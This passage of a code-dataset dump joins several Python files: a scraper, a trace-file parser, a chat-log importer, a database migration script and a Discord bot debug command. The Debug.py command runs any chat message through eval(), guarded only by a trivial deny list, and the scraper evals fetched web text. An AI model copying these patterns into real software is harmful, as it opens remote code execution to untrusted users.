fp:\n pass\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":24854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"493069755","text":"# Written by JP for HJK Group\n# Dpt of Chemical Engineering, MIT\n\nfrom structgen import *\nfrom molSimplify.Scripts.io import *\nimport argparse, sys, os, shutil, itertools, random\nimport pybel\n\ndef name_complex(core,ligs,ligoc,args):\n center = core.getAtom(0).symbol()\n name = center + '_'\n if args.oxstate:\n ox = str(args.oxstate)\n else:\n ox = \"0\"\n name += \"_ \" + str(ox)\n if args.spin:\n spin = str(args.spin)\n else:\n spin = \"0\"\n name += \"_ \" + str(spin)\n for i,lig in enumerate(ligs):\n names += '_' + str(lig[:3]) + '-' + str(ligoc[i])\n names += \"_\"+str(spin)\n return name\n\n","sub_path":"molSimplify/Scripts/namegen.py","file_name":"namegen.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"433390683","text":"import requests\nimport re\n\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'\n}\n\n\ndef get_info(url):\n html = requests.get(url, headers=headers)\n data = re.findall('var rankData = {datas:(.*),allRecord.*', html.text)\n data_list = eval(data[0])\n fund_code = []\n\n for i in range(0, len(data_list)):\n onefund_list = data_list[i].strip(',').split(',')\n fund_codes = onefund_list[0]\n fund_code.append(fund_codes)\n\n return fund_code\n\n","sub_path":"project/Review Crawer/fund/importFundCode.py","file_name":"importFundCode.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"386052380","text":"\"\"\"Trs类型曲线文件支持\"\"\"\n\nfrom datetime import datetime\nfrom Logger import logger\nfrom inspector.trace.Trace import TraceSet, Trace, TraceSetAttribute\nimport struct\nimport typing\nimport numpy as np\n\n\ndef _unpack_num(b: bytes, l: int, f: bool, c: int):\n \"\"\"\n bytes->number解析\n\n :param l: int型字节长度,f=True时不起作用\n :param f: 是否为float类型\n :param c: 需要解析的数量\n :return: 解析后的数字元组\n \"\"\"\n if f:\n fmt = '<%sf' % c\n dtype = 'f'\n elif l == 4:\n fmt = '<%si' % c\n dtype = 'i'\n elif l == 2:\n fmt = '<%sh' % c\n dtype = 'h'\n elif l == 1:\n fmt = '%sb' % c\n dtype = 'b'\n else:\n raise Exception('Format error.')\n return np.array(struct.unpack(fmt, b), dtype=dtype)\n\n\ndef _unpack_u_int(b: bytes) -> int:\n length = len(b)\n if length == 1:\n return _unpack_u_int1(b)\n if length == 2:\n return _unpack_u_int2(b)\n if length == 2:\n return _unpack_u_int2(b)\n\n\ndef _unpack_u_int1(b: bytes) -> int:\n return struct.unpack('B', b)[0]\n\n\ndef _unpack_u_int2(b: bytes) -> int:\n return struct.unpack(' int:\n return struct.unpack(' float:\n return __unpack(' str:\n return str(b, encoding='utf8')\n\n\ndef _unpack_bool(b: bytes) -> bool:\n return __unpack('?', b)\n\n\ndef __unpack(fmt: str, b: bytes):\n return struct.unpack(fmt, b)[0]\n\n\nclass TrsTraceSetHeader(object):\n def __init__(self):\n self.nt = None # type:int # Number of traces\n self.ns = None # type:int # Number of samples per trace\n self.sc = None # type:TrsSampleCoding #Sample Coding (see table )\n self.ds = 0 # type:int # Length of cryptographic data included in trace\n self.ts = 0 # type:int # Title space reserved per trace\n self.gt = None # type:str # “trace” Global trace title\n self.dc = None 
# type:str # Description\n self.xo = 0 # type:int # Offset in X-axis for trace representation\n self.xl = None # type:str # Label of X-axis\n self.yl = None # type:str # Label of Y-axis\n self.xs = 1.0 # type:float # Scale value for X-axis\n self.ys = 1.0 # type:float # Scale value for Y-axis\n self.to = 0 # type:int # Trace offset for displaying trace numbers\n self.ls = 0 # type:int # Logarithmic scale\n self.rg = 0.0 # type:float # Range of the scope used to perform acquisition\n self.cl = 0.0 # type:float # Coupling of the scope used to perform acquisition\n self.os = 0.0 # type:float # Offset of the scope used to perform acquisition\n self.ii = 0.0 # type:float # Input impedance of the scope used to perform acquisition\n self.ai = None # type:str # Device ID of the scope used to perform acquisition\n self.ft = 0 # type:int # The type of filter used during acquisition\n self.ff = 0.0 # type:float # Frequency of the filter used during acquisition\n self.fr = 0.0 # type:float # Range of the filter used during acquisition\n self.eu = False # type:bool # External clock used\n self.et = 0.0 # type:float # External clock threshold\n self.em = 0 # type:int # External clock multiplier\n self.ep = 0 # type:int # External clock phase shift\n self.er = 0 # type:int # External clock resampler mask\n self.re = False # type:bool # External clock resampler enabled\n self.ef = 0.0 # type:float # External clock frequency\n self.eb = 0 # type:int # External clock time base\n\n def update(self, tag: bytes, value: bytes):\n if tag == TrsTraceSetHeaderConstant.NT:\n self.nt = _unpack_u_int4(value)\n elif tag == TrsTraceSetHeaderConstant.NS:\n self.ns = _unpack_u_int4(value)\n elif tag == TrsTraceSetHeaderConstant.SC:\n self.sc = TrsSampleCoding(_unpack_u_int1(value))\n elif tag == TrsTraceSetHeaderConstant.DS:\n self.ds = _unpack_u_int2(value)\n elif tag == TrsTraceSetHeaderConstant.TS:\n self.ts = _unpack_u_int1(value)\n elif tag == TrsTraceSetHeaderConstant.GT:\n self.gt = _unpack_str(value)\n elif tag == TrsTraceSetHeaderConstant.DC:\n self.dc = _unpack_str(value)\n elif tag == TrsTraceSetHeaderConstant.XO:\n self.xo = _unpack_u_int4(value)\n elif tag == TrsTraceSetHeaderConstant.XL:\n self.xl = _unpack_str(value)\n elif tag == TrsTraceSetHeaderConstant.YL:\n self.yl = _unpack_str(value)\n elif tag == TrsTraceSetHeaderConstant.XS:\n self.xs = _unpack_float(value)\n elif tag == TrsTraceSetHeaderConstant.YS:\n self.ys = _unpack_float(value)\n elif tag == TrsTraceSetHeaderConstant.TO:\n self.to = _unpack_u_int4(value)\n elif tag == TrsTraceSetHeaderConstant.LS:\n self.ls = _unpack_u_int1(value)\n elif tag == TrsTraceSetHeaderConstant.RG:\n self.rg = _unpack_float(value)\n elif tag == TrsTraceSetHeaderConstant.CL:\n self.cl = _unpack_u_int4(value)\n elif tag == TrsTraceSetHeaderConstant.OS:\n self.os = _unpack_float(value)\n elif tag == TrsTraceSetHeaderConstant.II:\n self.ii = _unpack_float(value)\n elif tag == TrsTraceSetHeaderConstant.AI:\n self.ai = _unpack_str(value)\n elif tag == TrsTraceSetHeaderConstant.FT:\n self.ft = _unpack_u_int4(value)\n elif tag == TrsTraceSetHeaderConstant.FF:\n self.ff = _unpack_float(value)\n elif tag == TrsTraceSetHeaderConstant.FR:\n self.fr = _unpack_float(value)\n elif tag == TrsTraceSetHeaderConstant.EU:\n self.eu = _unpack_bool(value)\n elif tag == TrsTraceSetHeaderConstant.ET:\n self.et = _unpack_float(value)\n elif tag == TrsTraceSetHeaderConstant.EM:\n self.em = _unpack_u_int4(value)\n elif tag == TrsTraceSetHeaderConstant.EP:\n self.ep = _unpack_u_int4(value)\n 
elif tag == TrsTraceSetHeaderConstant.ER:\n self.er = _unpack_u_int4(value)\n elif tag == TrsTraceSetHeaderConstant.RE:\n self.er = _unpack_bool(value)\n elif tag == TrsTraceSetHeaderConstant.EF:\n self.ef = _unpack_float(value)\n elif tag == TrsTraceSetHeaderConstant.EB:\n self.eb = _unpack_u_int4(value)\n else:\n pass\n\n def to_string(self):\n return \\\n ('nt:\\t', self.nt), \\\n ('ns:\\t', self.ns), \\\n ('sc:\\t', self.sc.type), \\\n ('sc:\\t', self.sc.length), \\\n ('ds:\\t', self.ds), \\\n ('ts:\\t', self.ts), \\\n ('gt:\\t', self.gt), \\\n ('dc:\\t', self.dc), \\\n ('xo:\\t', self.xo), \\\n ('xl:\\t', self.xl), \\\n ('yl:\\t', self.yl), \\\n ('xs:\\t', self.xs), \\\n ('ys:\\t', self.ys), \\\n ('to:\\t', self.to), \\\n ('ls:\\t', self.ls), \\\n ('rg:\\t', self.rg), \\\n ('cl:\\t', self.cl), \\\n ('os:\\t', self.os), \\\n ('ii:\\t', self.ii), \\\n ('ai:\\t', self.ai), \\\n ('ft:\\t', self.ft), \\\n ('ff:\\t', self.ff), \\\n ('fr:\\t', self.fr), \\\n ('eu:\\t', self.eu), \\\n ('et:\\t', self.et), \\\n ('em:\\t', self.em), \\\n ('ep:\\t', self.ep), \\\n ('er:\\t', self.er), \\\n ('re:\\t', self.re), \\\n ('ef:\\t', self.ef), \\\n ('eb:\\t', self.eb)\n\n\nclass TrsTraceSetAttribute(object):\n def __init__(self):\n self.headerLen = 0 # type: int\n self.traceLen = 0 # type: int\n self.header = None # type: TrsTraceSetHeader\n\n def to_string(self):\n return \\\n ('header', self.headerLen), \\\n ('trace', self.traceLen), \\\n (self.header.to_string())\n\n\nclass TrsSampleCoding(object):\n def __init__(self, value: int):\n if value is not None:\n self.isFloat = value & 0x10 == 0x10\n self.type = 'float' if self.isFloat else 'int'\n self.length = value & 0xF\n\n\nclass TrsTraceSetHeaderConstant(object):\n \"\"\"\n Reference K Trace set coding>\n \"\"\"\n NT = b'\\x41' # M int 4 Number of traces\n NS = b'\\x42' # M int 4 Number of samples per trace\n SC = b'\\x43' # M byte 1 Sample Coding (see table )\n DS = b'\\x44' # O short 2 0 Length of cryptographic data included in trace\n TS = b'\\x45' # O byte 1 0 Title space reserved per trace\n GT = b'\\x46' # O byte[] variable “trace” Global trace title\n DC = b'\\x47' # O byte[] variable None Description\n XO = b'\\x48' # O int 4 0 Offset in X-axis for trace representation\n XL = b'\\x49' # O byte[] variable None Label of X-axis\n YL = b'\\x4A' # O byte[] variable None Label of Y-axis\n XS = b'\\x4B' # O float 4 1 Scale value for X-axis\n YS = b'\\x4C' # O float 4 1 Scale value for Y-axis\n TO = b'\\x4D' # O int 4 0 Trace offset for displaying trace numbers\n LS = b'\\x4E' # O byte 1 0 Logarithmic scale\n RG = b'\\x55' # O float 4 0 Range of the scope used to perform acquisition\n CL = b'\\x56' # O int 4 0 Coupling of the scope used to perform acquisition\n OS = b'\\x57' # O float 4 0 Offset of the scope used to perform acquisition\n II = b'\\x58' # O float 4 0 Input impedance of the scope used to perform acquisition\n AI = b'\\x59' # O byte[] variable Device ID of the scope used to perform acquisition\n FT = b'\\x5A' # O int 4 0 The type of filter used during acquisition\n FF = b'\\x5B' # O float 4 0 Frequency of the filter used during acquisition\n FR = b'\\x5C' # O float 4 0 Range of the filter used during acquisition\n TB = b'\\x5F' # M none 0 Trace block marker: an empty TLV that marks the end of the header\n EU = b'\\x60' # O boolean 1 false External clock used\n ET = b'\\x61' # O float 4 0 External clock threshold\n EM = b'\\x62' # O int 4 0 External clock multiplier\n EP = b'\\x63' # O int 4 0 External clock phase shift\n ER = b'\\x64' # 
O int 4 0 External clock resampler mask\n RE = b'\\x65' # O boolean 1 0 External clock resampler enabled\n EF = b'\\x66' # O float 4 0 External clock frequency\n EB = b'\\x67' # O int 4 0 External clock time base\n\n\nclass TrsTrace(object):\n def __init__(self):\n self.dataX = None # type:typing.List\n self.dataY = None # type:typing.List\n self.cryptographicData = None\n self.title = None\n\n\nclass TrsTraceSet(TraceSet):\n\n def __init__(self, path, read=True):\n super().__init__(path)\n\n def getFilePath(self) -> str:\n return self.path\n\n def getTitle(self) -> str:\n return self.trsAttr.header.gt\n\n def getTraceCount(self) -> int:\n return self.trsAttr.header.nt\n\n def getTrace(self, index: int, region_x: typing.List = None) -> Trace:\n trsTrace = self.traces.get(index)\n if trsTrace is None:\n trsTrace = TrsParser.parseTrace(self.file, index, self.getTrsAttribute())\n self.traces[index] = trsTrace\n trace = Trace(index, trsTrace.dataX, trsTrace.dataY,\n scalaX=self.trsAttr.header.xs,\n scalaY=self.trsAttr.header.ys,\n labelX=self.trsAttr.header.xl,\n labelY=self.trsAttr.header.yl,\n title=trsTrace.title,\n cryptographicData=trsTrace.cryptographicData)\n return trace\n\n def destroy(self):\n if not self.file.closed:\n self.file.close()\n\n def getHeader(self):\n return self.trsAttr.header\n\n def getTrsAttribute(self):\n return self.trsAttr\n\n def getAttribute(self) -> TraceSetAttribute:\n attr = TraceSetAttribute()\n # trsAttr = self.getTrsAttribute()\n header = self.getTrsAttribute().header\n # samples\n attr.sampleFirst = 0 # TODO 在哪里指定的\n attr.sampleNumber = header.ns\n attr.sampleSize = True if header.sc.isFloat else header.sc.length\n attr.sampleSign = True # TODO 在哪里指定的\n attr.sampleByteOrder = False # TODO 在哪里指定的\n # traces\n attr.traceFirst = 0 # TODO 在哪里指定的\n attr.traceNumber = header.nt\n attr.traceDataSpace = header.ds\n attr.traceTitleSpace = header.ts\n attr.traceYLabel = header.yl\n attr.traceYScale = header.ys\n attr.traceXLabel = header.xl\n attr.traceXScale = header.xs\n attr.traceXOffset = header.xo\n # global strings\n attr.globalTraceTitle = header.gt\n attr.globalDescription = header.dc\n return attr\n\n def read(self):\n self.file = open(self.path, 'rb')\n self.traces = {}\n self.trsAttr = TrsParser.parseAttribute(self.file) # type:TrsTraceSetAttribute\n\n def write(self):\n self.file = open(self.path, 'w+b')\n self.traces = {}\n\n\nclass TrsParser(object):\n\n @staticmethod\n def parseAttribute(file: typing.BinaryIO) -> TrsTraceSetAttribute:\n header = TrsTraceSetHeader()\n attribute = TrsTraceSetAttribute()\n tag = file.read(1)\n attribute.headerLen += 1\n while tag != TrsTraceSetHeaderConstant.TB:\n lenBytes = file.read(1)\n attribute.headerLen += 1\n if lenBytes[0] & 0x80 == 0x80:\n lenLen = lenBytes[0] & 0x7f\n lenBytes = file.read(lenLen)\n attribute.headerLen += lenLen\n valueLen = _unpack_u_int(lenBytes)\n value = file.read(valueLen)\n attribute.headerLen += valueLen\n header.update(tag, value)\n tag = file.read(1)\n attribute.headerLen += 1\n attribute.headerLen += 1\n attribute.traceLen = header.ns * header.sc.length + header.ds + header.ts\n attribute.header = header\n return attribute\n\n @staticmethod\n def parseTrace(file: typing.BinaryIO, index: int, attribute: TrsTraceSetAttribute) -> TrsTrace:\n \"\"\"\n 返回TrsTrace对象,只包含Y轴集合\n :param file: 解析的文件\n :param index: 曲线索引\n :param attribute: 曲线集合属相\n :return: 曲线对象\n \"\"\"\n s = datetime.now()\n logger.debug('parse trace data %s', s)\n file.seek(attribute.headerLen + attribute.traceLen * index)\n 
trace = TrsTrace()\n trace.title = _unpack_str(file.read(attribute.header.ts))\n trace.cryptographicData = file.read(attribute.header.ds)\n bs = file.read(attribute.header.sc.length * attribute.header.ns)\n trace.dataY = _unpack_num(bs, attribute.header.sc.length, attribute.header.sc.isFloat, attribute.header.ns)\n logger.debug('parse trace data <<< %s', datetime.now() - s)\n return trace\n","sub_path":"inspector/trace/TrsTrace.py","file_name":"TrsTrace.py","file_ext":"py","file_size_in_byte":14974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"436586523","text":"#coding=utf-8\nimport discord\nimport os.path\nimport traceback\nimport math\nimport cmath\n\nPATH='.\\login.ini'\n\nif os.path.isfile(PATH) and os.access(PATH, os.R_OK):\n import ConfigParser\n config = ConfigParser.ConfigParser()\n config.readfp(open(PATH))\n discord_user_id = config.get(\"login\", \"userid\")\nelse:\n discord_user_id = 'user_id'\n\ndef debug(client, message):\n if(message.content.startswith('::debug')):\n debugcode = message.content[len(\"::debug \"):].strip()\n if debugcode.rfind(\"client.logout()\") != -1:\n debugcode = 'InvalidDebugCode : Invalid Input to this Debug Command.'\n client.send_message(message.channel, \"```py\\n\" + debugcode + \"\\n```\")\n elif debugcode.rfind(\"os._exit(\") != -1:\n debugcode = 'InvalidDebugCode : Invalid Input to this Debug Command.'\n client.send_message(message.channel, \"```py\\n\" + debugcode + \"\\n```\")\n else:\n try:\n debugcode = eval(debugcode)\n except Exception as e:\n debugcode = traceback.format_exc()\n debugcode = str(debugcode)\n client.send_message(message.channel, \"```py\\n\" + debugcode + \"\\n```\")","sub_path":"DecoraterBotCore/Debug.py","file_name":"Debug.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"164409175","text":"class Queue:\r\n def __init__(self):\r\n self.items = []\r\n\r\n def isEmpty(self):\r\n if len(self.items)==0:\r\n print(\"Queue is empty.\")\r\n else:\r\n print(\"Queue isn't empty.\")\r\n\r\n def enqueue(self, item):\r\n self.items.append(item)\r\n\r\n def dequeue(self):\r\n if len(self.items) == 0:\r\n print(\"Queue is empty.\")\r\n else:\r\n return self.items.pop(0)\r\n\r\n def size(self):\r\n return print(len(self.items))\r\n\r\n def print_queue(self):\r\n print(self.items)\r\n\r\nq = Queue()\r\nq.enqueue(\"1\")\r\nq.enqueue(\"2\")\r\nq.enqueue(\"3\")\r\nq.print_queue()\r\nq.dequeue()\r\nq.print_queue()\r\nq.size()\r\nq.dequeue()\r\nq.dequeue()\r\nq.isEmpty()\r\n\r\n\r\n","sub_path":"Datastructures/queue.py","file_name":"queue.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"256398742","text":"import os\nfrom models import *\nfrom datetime import timedelta, datetime\nfrom parsers.parser_base import ParserBase\nfrom dateutil import parser\nimport re\nfrom helpers_cmd import instruct_continue\nimport codecs\nfrom helpers_cmd import progress\nfrom PyInquirer import style_from_dict, Token, prompt, Separator\n\nstyle = style_from_dict({\n Token.Separator: '#cc5454',\n Token.QuestionMark: '#673ab7 bold',\n Token.Selected: '#cc5454', # default\n Token.Pointer: '#673ab7 bold',\n Token.Instruction: '', # default\n Token.Answer: '#f44336 bold',\n Token.Question: '',\n})\n\n# This software was developed to parse SPI collected data from GB Whatsapp to s-report DB format\n\n\nclass 
SPIParser(ParserBase):\n def __init__(self):\n self.expressions = [\n (r'(?P(\\d{2}/\\d{2}/\\d{2})?\\s(\\d{1,2}:\\d{2} ((PM)|(AM))))?\\s?(-(?P.*?):)?\\s?(?P.*)',\n r'((\\d{2}/\\d{2}/\\d{2})?\\s(\\d{1,2}:\\d{2} ((PM)|(AM))))', '%d/%m/%y %I:%M %p'),\n (r'(?P(\\d{2}/\\d{2}/\\d{4})?\\s(\\d{1,2}:\\d{2}))?\\s?(-(?P.*?):)?\\s?(?P.*)',\n r'((\\d{2}/\\d{2}/\\d{4})?\\s(\\d{1,2}:\\d{2}))', '%d/%m/%Y %H:%M')\n ]\n self.percentual = 0.8\n self.exp = None\n # self.exp = r'((\\d{2}/\\d{2}/\\d{2})?\\s(\\d{1,2}:\\d{2} ((PM)|(AM))))?\\s?(-.*?:)?\\s?(.*)'\n # self.exp_split_marker = r'((\\d{2}/\\d{2}/\\d{2})?\\s(\\d{1,2}:\\d{2} ((PM)|(AM))))'\n self.att_path = \"anexos_whatsapp_spi\"\n self.chats_path = \"conversas_whatsapp_spi\"\n\n\n def choose_exp(self):\n exps = {item[1]: item for item in self.expressions}\n questions = [\n {\n 'type': 'list',\n 'message': 'Selecione uma expressão regular: ',\n 'name': 'exp',\n 'pageSize': 3,\n 'choices': exps.keys()\n }\n ]\n res = prompt(questions, style=style)['exp']\n self.exp = exps[res]\n\n\n def read_chat(self, filename):\n with codecs.open(os.path.join(self.chats_path, filename), 'r', 'utf-8') as f:\n text = f.read()\n\n # Analisa qual das expressões regulares funcionam melhor\n lines = text.split(\"\\n\")\n n = len(lines)\n i = 0\n self.exp = None\n for exp in self.expressions:\n for line in lines:\n if re.match(exp[1], line):\n i += 1\n if i/n >= self.percentual:\n self.exp = exp\n break\n if self.exp is not None:\n break\n\n if self.exp is not None:\n chat = Chat()\n chat.name = os.path.basename(filename)[:-4]\n chat.source = \"Whatsapp\"\n chat.deleted_state = \"Intact\"\n self.add(chat)\n\n message_text = re.sub(self.exp[1], r'\\1', text)\n splitted_text = message_text.split('')[1:]\n for msg_raw in splitted_text:\n result = self.line2message(msg_raw)\n if not result:\n continue\n msg = Message()\n if result['from']:\n p = self.add_participant(\n result['from'], result['from']) # participante\n msg.from_ = p\n if not p in chat.participants:\n chat.participants.append(p)\n msg.body = result['body']\n msg.deleted_state = \"Intact\"\n attachment_regex = r'(.*\\..{3,4}\\s+){1}(?:\\(.*\\)){1}'\n regex_test = re.search(attachment_regex, msg.body)\n if regex_test:\n attachment_regex_valitade = r'(.*\\..{3,4}\\s+)'\n regex_test = re.search(attachment_regex, msg.body).groups()\n validate = re.search(\n attachment_regex_valitade, regex_test[0])\n if validate:\n validate = validate.string\n validate = validate.strip()\n validate = validate[1:]\n validate = os.path.join(self.att_path, validate)\n if os.path.exists(validate):\n attachment = File()\n attachment.extracted_path = str(validate)\n attachment.filename = os.path.basename(\n attachment.extracted_path)\n attachment.size = os.path.getsize(\n attachment.extracted_path)\n self.add(attachment)\n msg.attachments.append(attachment)\n\n if result['timestamp']:\n try:\n date = datetime.strptime(\n result['timestamp'], self.exp[2])\n msg.timestamp = date\n except:\n pass\n self.add(msg)\n chat.messages.append(msg)\n self.add(chat)\n self.commit()\n\n def check_env(self):\n msgs = []\n return msgs\n\n def run(self):\n if not os.path.exists(self.chats_path):\n os.mkdir(self.chats_path)\n if not os.path.exists(self.att_path):\n os.mkdir(self.att_path)\n instruct_continue(\n f\"Mova os arquivos que tem o texto das mensagens para a pasta '{self.chats_path}' e os anexos para a pasta '{self.att_path}'\")\n self.lista = self.getChatsFilename()\n print(\"Lendo chats...\")\n n = len(self.lista)\n for i, item in 
enumerate(self.lista):\n print(f\"\\nLendo conversa '{item}'\")\n progress(i, n)\n self.read_chat(item)\n\n def getChatsFilename(self):\n return os.listdir(self.chats_path)\n\n def line2message(self, message):\n result = re.search(self.exp[0], message, flags=re.DOTALL)\n if result:\n timestamp = result.group('timestamp')\n from_ = result.group('from')\n body = result.group('body')\n return {\n 'timestamp': timestamp.strip() if timestamp else '',\n 'from': from_.strip() if from_ else '',\n 'body': body.strip() if body else ''\n }\n\n # this must receive an array in the following scheme -> [(str) date_time, msg_from (str), msg(str)]\n # def populate_message_table(self, message_block):\n # date = datetime.strptime(message_block[0], '%d/%m/%y %I:%M %p')\n # participant = message_block[1]\n # msg = message_block[2]\n\n def add_participant(self, identifier, name):\n participant = db_session.query(Participant).filter(\n Participant.identifier == identifier, Participant.name == name).first()\n if not participant:\n participant = Participant()\n participant.identifier = identifier\n participant.name = name\n self.add(participant)\n self.commit()\n return participant\n","sub_path":"parsers/spi2db/spi2db.py.bd9172253dae44b6968dbfdb47f1fd6d.py","file_name":"spi2db.py.bd9172253dae44b6968dbfdb47f1fd6d.py","file_ext":"py","file_size_in_byte":7034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"163317799","text":"import concurrent.futures as cf\nfrom sqlalchemy import *\nfrom sqlalchemy.orm import sessionmaker, scoped_session\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom pprint import pprint\nfrom datetime import datetime\n\nPG_DBNAME = ''\nPG_USER = ''\nPG_PASSWORD = ''\nMY_DBNAME = ''\nMY_USER = ''\nMY_PASWORD = ''\nDB_HOST = ''\n\nmy_config = {'username': MY_USER, 'password': MY_PASWORD, 'database': MY_DBNAME, 'host': DB_HOST}\npg_config = {'username': PG_USER, 'password': PG_PASSWORD, 'database': PG_DBNAME, 'host': DB_HOST}\n\nfinal_code = \"mysql://{username}:{password}@{host}:3306/{database}\".format(**my_config)\npg_dsn = \"postgresql+psycopg2://{username}@{host}:5432/{database}\".format(**pg_config)\n\nBase = declarative_base()\nsrc = create_engine(final_code, pool_recycle=180)\ndst = create_engine(pg_dsn)\npg_meta = MetaData(bind=dst, schema=\"fintweet\")\nmy_meta = MetaData(bind=src)\n\n\n# Reflect destination tables\n\nclass MyUsers(Base):\n __table__ = Table('user', my_meta, autoload=True)\n\n\nclass MyUsersCount(Base):\n __table__ = Table('user_count', my_meta, autoload=True)\n\n\nclass MyTweets(Base):\n __table__ = Table('tweet', my_meta, autoload=True)\n\n\nclass MyTweetCounts(Base):\n __table__ = Table('tweet_count', my_meta, autoload=True)\n\n\nclass MyTweetCashtags(Base):\n __table__ = Table('tweet_cashtags', my_meta, autoload=True)\n\n\nclass MyTweetHashtags(Base):\n __table__ = Table('tweet_hashtags', my_meta, autoload=True)\n\n\nclass MyTweetMentions(Base):\n __table__ = Table('tweet_mentions', my_meta, autoload=True)\n\n\nclass MyTweetUrls(Base):\n __table__ = Table('tweet_url', my_meta, autoload=True)\n\n\n# class MyPermno(Base):\n# __table__ = Table('permno', my_meta, autoload=True)\n\n\nclass PgUsers(Base):\n __table__ = Table('user', pg_meta, autoload=True)\n\n\nclass PgUsersCount(Base):\n __table__ = Table('user_count', pg_meta, autoload=True)\n\n\nclass PgTweets(Base):\n __table__ = Table('tweet', pg_meta, autoload=True)\n\n\nclass PgTweetCounts(Base):\n __table__ = Table('tweet_count', pg_meta, 
autoload=True)\n\n\nclass PgTweetCashtags(Base):\n __table__ = Table('tweet_cashtags', pg_meta, autoload=True)\n\n\nclass PgTweetHashtags(Base):\n __table__ = Table('tweet_hashtags', pg_meta, autoload=True)\n\n\nclass PgTweetMentions(Base):\n __table__ = Table('tweet_mentions', pg_meta, autoload=True)\n\n\nclass PgTweetUrls(Base):\n __table__ = Table('tweet_url', pg_meta, autoload=True)\n\n\n# Create a session to use the tables\nSrcSession = sessionmaker(bind=src)\nsession_factory = sessionmaker(dst, autocommit=True, autoflush=True)\n# DstSession = scoped_session(session_factory)\nDstSession = sessionmaker(bind=dst)\n\nsrcssn = SrcSession()\ndstssn = DstSession()\n\n\ndef transfer_user(row):\n try:\n dstssn = DstSession()\n print(\"Inserting user:\", row.user_id)\n item = PgUsers(\n user_id=row.user_id,\n twitter_handle=row.twitter_handle,\n user_name=row.user_name,\n location=row.location,\n date_joined=row.date_joined,\n timezone=row.timezone,\n website=row.website,\n user_intro=row.user_intro,\n verified=row.verified\n )\n dstssn.add(item)\n dstssn.commit()\n\n except BaseException as e:\n print(str(e))\n raise\n\n\ndef transfer_user_count(row):\n try:\n dstssn = DstSession()\n print(\"Inserting count for user_id:\", row.user_id)\n item = PgUsersCount(\n user_id=row.user_id,\n follower=row.follower,\n following=row.following,\n tweets=row.tweets,\n likes=row.likes\n )\n dstssn.add(item)\n dstssn.commit()\n\n except BaseException as e:\n print(str(e))\n raise\n\n\ndef transfer_tweets(row):\n try:\n dstssn = DstSession()\n print(\"Inserting tweet with tweet_id:\", row.tweet_id)\n item = PgTweets(\n tweet_id=row.tweet_id,\n date=row.date,\n time=row.time,\n timezone=row.timezone,\n retweet_status=row.retweet_status,\n text=row.text,\n location=row.location,\n user_id=row.user_id,\n emoticon=row.emoticon\n )\n dstssn.add(item)\n dstssn.commit()\n\n except BaseException as e:\n print(str(e))\n raise\n\n\ndef transfer_tweet_counts(row):\n try:\n dstssn = DstSession()\n print(\"Inserting tweet count with tweet_id:\", row.tweet_id)\n item = PgTweetCounts(\n tweet_id=row.tweet_id,\n reply=row.reply,\n retweet=row.retweet,\n favorite=row.favorite\n )\n dstssn.add(item)\n dstssn.commit()\n\n except BaseException as e:\n print(str(e))\n raise\n\n\ndef transfer_tweet_cashtags(row):\n try:\n dstssn = DstSession()\n print(\"Inserting cashtags with tweet_id:\", row.tweet_id)\n item = PgTweetCashtags(\n tweet_id=row.tweet_id,\n cashtags=row.cashtags\n )\n dstssn.add(item)\n dstssn.commit()\n\n except BaseException as e:\n print(str(e))\n raise\n\n\ndef transfer_tweet_hashtags(row):\n try:\n dstssn = DstSession()\n print(\"Inserting hashtags with tweet_id:\", row.tweet_id)\n item = PgTweetHashtags(\n tweet_id=row.tweet_id,\n hashtags=row.hashtags\n )\n dstssn.add(item)\n dstssn.commit()\n\n except BaseException as e:\n print(str(e))\n raise\n\n\ndef transfer_tweet_mentions(row):\n try:\n dstssn = DstSession()\n print(\"Inserting mentions with tweet_id:\", row.tweet_id)\n item = PgTweetMentions(\n tweet_id=row.tweet_id,\n mentions=row.mentions,\n user_id=row.user_id\n )\n dstssn.add(item)\n dstssn.commit()\n\n except BaseException as e:\n print(str(e))\n raise\n\n\ndef transfer_tweet_urls(row):\n try:\n dstssn = DstSession()\n print(\"Inserting urls with tweet_id:\", row.tweet_id)\n item = PgTweetUrls(\n tweet_id=row.tweet_id,\n url=row.url,\n link=row.link\n )\n dstssn.add(item)\n dstssn.commit()\n\n except BaseException as e:\n print(str(e))\n raise\n\n\nif __name__ == '__main__':\n # for my_user in 
srcssn.query(MyUsers).execution_options(stream_results=True).yield_per(200):\n # pg_user=dstssn.query(PgUsers).filter_by(user_id=my_user.user_id).first()\n # if pg_user is None:\n # transfer_user(my_user)\n #\n # for my_user_count in srcssn.query(MyUsersCount).execution_options(stream_results=True).yield_per(200):\n # pg_user_count=dstssn.query(PgUsersCount).filter_by(user_id=my_user_count.user_id).first()\n # if pg_user_count is None:\n # transfer_user_count(my_user_count)\n\n # for my_tweet in srcssn.query(MyTweets).execution_options(stream_results=True).yield_per(20):\n # pg_tweet=dstssn.query(PgTweets).filter_by(tweet_id=my_tweet.tweet_id).first()\n # if pg_tweet is None:\n # transfer_tweets(my_tweet)\n\n # for my_cashtag in srcssn.query(MyTweetCashtags).filter(MyTweetCashtags.tweet_id>749853111913558016).order_by(MyTweetCashtags.tweet_id.asc()).execution_options(stream_results=True).yield_per(50):\n # pg_cashtag=dstssn.query(PgTweetCashtags)\\\n # .filter_by(tweet_id=my_cashtag.tweet_id)\\\n # .filter_by(cashtags=my_cashtag.cashtags)\\\n # .first()\n # if pg_cashtag is None:\n # transfer_tweet_cashtags(my_cashtag)\n # else:\n # print('Cashtag entry', pg_cashtag.cashtags, 'for tweet_id', pg_cashtag.tweet_id, 